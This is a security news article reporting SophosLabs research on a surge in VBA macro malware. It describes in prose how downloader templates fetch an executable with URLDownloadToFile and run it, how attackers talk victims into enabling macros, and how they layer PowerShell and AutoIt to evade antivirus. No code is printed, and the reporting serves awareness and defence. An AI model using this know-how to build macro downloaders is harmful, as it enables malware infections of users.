VBA malware on the rise, a threat wrongly underestimated

Security experts at Sophos have detected a surge in cyber attacks based on VBA malware, such threats are still very insidious but often underestimated.

Experts at SophosLabs observed a surge in VBA malware, according their analysis macro-based malware accounted for 28 percent of all malware attack detected in July, up from just six percent in June, despite 58 percent of the attacks used known exploits.

The experts discovered different VBA downloader templates, which contain VBA code and the instructions for the authors of VBA Malware on how to package their malicious code and how to obfuscate it.

VBA malware is largely used cyber threat actors due the possibility to rapidly change their code to implement new evasion techniques, the exploits have a rigid file structure that makes it difficult to apply any change, for the same purpose, without affecting functionality.

“Visual Basic code is easy to write, flexible and easy to refactor. Similar functionality can often be expressed in many different ways which gives malware authors more options for producing distinct, workable versions of their software than they have with exploits.” wrote Graham Chantry, a senior security researcher at SophosLabs, in a blog post.

Another advantage in the use of Visual Basic malware is that, unlike exploits, they are not “tied to specific versions of Microsoft Office”, it is enough that victims run a vulnerable version of Office as well as not effective anti-virus software for the malicious code to infect the machine.

VBA malware has a big drawback respect exploits, it could be easily neutralized properly configuring the Microsoft’s “Macro Security Level”. Newer Office versions, including 2007 or later disables VBA macros from untrusted sources by default and executes code only “if the user explicitly enables them.”

This means that the attacker needs a further effort to convince the victim to perform an operation, authorizing the execution of the code. Typically this is done through social engineering, for example, informing the user that the code being executed has a purpose for his interest and requires the disable of defensive features.

“To overcome this limitation, authors of malicious VBA code have to use Social Engineering techniques to trick users in to running their macros.” states the post.

Visual Basic document based malware is usually spread through spam campaigns in which the attached document hidden the malicious code.

The blog post includes a template of VBA Malware downloader in which it is necessary to substitute the DIRECT LINK HERE string with a URI to a malicious code.

 “imports the Windows API URLDownloadToFile to download an executable into the user’s temporary directory,” “Once downloaded, the code uses the shell command to execute the dropped sample as a separate process.” states the post.

 

 

The availability of these templates make it easier to write malicious code for VBA malware authors, the structure proposed in the example by Sophos is widely adopted for VBA downloaders, accounting for about 34 percent of all macro downloaders that have been detected by Sophos in July.

Fortunately, variants recently detected using these templates are very similar and could be easily neutralized by heuristic detection.

The threat posed by VBA malware should not be underestimated, as explained in the post the experts detected numerous variants implementing creative techniques to infect victim’s machines.

we saw Visual Basic code executing an encoded PowerShell script, to inject assembler code into memory,”  “More recent variants have even utilised the AutoIt scripting language and traditional Batchscript.” By adding new layers to the infection process malware authors are likely trying to “conceal their true intentions from AV detection (wrapping malicious assembler code within PowerShell, within Visual Basic, etc.),” Chantry explained. “Obfuscating the malicious payload may be somewhat effective against static signature based detection but the obfuscation process itself serves as an excellent trait for heuristic detection. The only question now is what languages will they choose next?”

Pierluigi Paganini

(Security Affairs – Sophos, VBA Malware)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Cisco addressed high-severity flaws in IOS and IOS XE software

Cisco addressed multiple vulnerabilities in IOS and IOS XE software that can be exploited to…

11 hours ago

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

18 hours ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

1 day ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

1 day ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

2 days ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

2 days ago

This website uses cookies.